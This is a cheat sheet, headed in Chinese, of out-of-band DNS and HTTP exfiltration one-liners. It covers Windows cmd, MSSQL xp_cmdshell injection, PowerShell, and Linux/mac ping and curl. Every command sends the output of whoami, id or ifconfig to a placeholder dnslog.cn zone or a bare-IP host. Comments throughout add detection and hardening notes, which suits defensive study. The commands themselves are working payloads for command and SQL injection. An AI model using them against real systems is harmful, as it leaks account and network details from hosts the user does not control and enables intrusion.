各种环境下的 DNS / HTTP 外带回显

1. windows 命令行:

REM Sends the Base64-encoded output of whoami out of the host as the leftmost label of a DNS query.
REM   whoami > temp               : the command output is written to the file "temp" in the current directory
REM   certutil -encode temp temp2 : Base64-encodes that file; certutil wraps the data in BEGIN/END CERTIFICATE lines
REM   findstr /L /V "CERTIFICATE" : keeps only the lines that do not contain that literal, i.e. the Base64 body
REM   set /p MYVAR=< temp3        : reads the first line of temp3 into MYVAR
REM   /v enables delayed expansion, which is what lets !MYVAR! and !FINAL! resolve inside this single line.
REM "xxx" is presumably a placeholder for the per-session subdomain of the DNS logging service.
REM Observable artefacts: temp, temp2 and temp3 stay on disk (nothing here deletes them); whoami,
REM certutil -encode, findstr and nslookup run in sequence under one cmd.exe; the resolver sees a query whose
REM first label is a Base64 string. Resolver query logging shows it, and forcing all DNS through a monitored
REM internal resolver removes the direct path.
cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 && set /p MYVAR=< temp3 && set FINAL=!MYVAR!.xxx.dnslog.cn && nslookup !FINAL!"

2. mssql:

-- The same encode-and-resolve sequence, run through SQL Server's xp_cmdshell in three statements.
-- %26%26 is the URL-encoded form of && ; presumably the statements travel inside an HTTP parameter
-- (SQL injection) - confirm against the delivery context.
-- Hardening and detection: xp_cmdshell is disabled by default on current SQL Server versions, so keep it
-- disabled and alert on sp_configure changes that enable it; run the service under a low-privileged account;
-- treat cmd.exe, certutil.exe or ping.exe spawned by sqlservr.exe as a high-confidence alert.
-- Statement 1: whoami -> D:/temp, Base64 via certutil -> D:/temp2, CERTIFICATE lines removed -> D:/temp3.
exec master..xp_cmdshell  "whoami>D:/temp%26%26certutil -encode D:/temp D:/temp2%26%26findstr /L /V ""CERTIFICATE"" D:/temp2>D:/temp3";
-- Statement 2: reads the first line of D:/temp3 and pings <value>.xxx.dnslog.cn; the name lookup carries the value.
exec master..xp_cmdshell  "cmd /v /c""set /p MYVAR=< D:/temp3 %26%26 set FINAL=!MYVAR!.xxx.dnslog.cn %26%26 ping !FINAL!""";
-- Statement 3: deletes the three working files, so file-creation telemetry matters more than a later disk search.
exec master..xp_cmdshell  "del ""D:/temp"" ""D:/temp2"" ""D:/temp3""";

3. windows 通过start外带

REM Two for /F loops that read the output of whoami and send it out without writing temp files.
REM xx.xx.xx.xx and xx.dnslog.cn are placeholders for the receiving HTTP host and DNS logging zone.
REM Loop 1: start hands http://xx.xx.xx.xx:80/<value> to the default URL handler, so the value travels in
REM the path of an HTTP request.
for /F %X in ('whoami') do start http://xx.xx.xx.xx:80/%X
REM Loop 2: delims=\ tokens=2 keeps the second backslash-separated field of the whoami output and sends one
REM echo request (-n 1) to <field>.xx.dnslog.cn; the DNS lookup for that name carries the value.
REM Observable artefacts: a browser or URL handler launched from a non-interactive parent process, a proxy log
REM entry for a request to a bare IP address, and a resolver log entry with an account name as a subdomain label.
for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xx.dnslog.cn

4. windows powershell

REM for /F captures the first token of the whoami output in %X and passes it to PowerShell, which
REM Base64-encodes its UTF-8 bytes into $a and calls System.Net.WebClient.DownloadString on
REM http://xx.xx.xx.xx/<Base64> (xx.xx.xx.xx is a placeholder address), i.e. the value leaves in an HTTP GET path.
REM Observable artefacts: powershell.exe started by cmd.exe with ToBase64String and Net.WebClient on its
REM command line (process-creation auditing with command lines and PowerShell script block logging record
REM both), and a proxy or firewall log entry for a GET to a bare IP address with a Base64 path.
for /F %X in ('whoami') do powershell $a=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('%X'));$b=New-Object System.Net.WebClient;$b.DownloadString('http://xx.xx.xx.xx/'+$a);

5. linux/mac 通过ping

# Command substitution puts the current user name in front of .xxx.dnslog.cn (xxx is presumably a
# placeholder), and ping -c 1 sends a single echo request to that name. The value already leaves the host
# in the DNS lookup for the name, so filtering outbound ICMP alone does not stop it.
# Detection: resolver logs showing local account names as subdomain labels of an external logging zone;
# a ping child process under a web or application server process.
ping -c 1 $(whoami).xxx.dnslog.cn

6. linux/mac 通过ping+base64

# The output of whoami is piped through base64 and the encoded text becomes the leftmost label of the
# name passed to ping -c 1; the DNS lookup for that name carries the encoded value.
# Detection: the encoding hides the plain user name from keyword matching, so look for queries whose first
# label is long or decodes cleanly as Base64, and for unusual query volume to a single external zone.
ping -c 1 $(whoami|base64).xxx.dnslog.cn

7. linux/mac 通过curl

# Two curl forms that carry the whoami output; xx.xx.xx.xx and xx.dnslog.cn are placeholders.
# Form 1: the user name is the path of an HTTP request to a bare IP address (visible in proxy/firewall logs).
curl http://xx.xx.xx.xx/$(whoami)
# Form 2: the user name is a host name label, so it is disclosed by the DNS lookup whether or not the
# HTTP connection that follows succeeds (visible in resolver logs).
# Mitigation for both: hosts with no need for arbitrary outbound access should reach the internet only
# through an allow-listing proxy and a logged internal resolver.
curl http://$(whoami).xx.dnslog.cn

8. linux/mac 通过curl+base64

# Base64 variants of the curl forms; xx.xx.xx.xx and xx.dnslog.cn are placeholders.
# Line 1: the Base64-encoded output of id is sent as the path of an HTTP request.
curl http://xx.xx.xx.xx/$(id|base64)
# Line 2: the same encoded value is used as a host name label, so the DNS lookup carries it.
curl http://$(id|base64).xx.dnslog.cn
# Line 3: the full ifconfig output is encoded, and tr replaces every newline in the Base64 text with '-'
# so that the multi-line output becomes one path string.
# Detection: very long request paths or DNS labels made of Base64 characters, sent from a server process
# to a bare IP address or an external logging zone, stand out against normal outbound traffic.
curl http://xx.xx.xx.xx/$(ifconfig|base64|tr '\n' '-')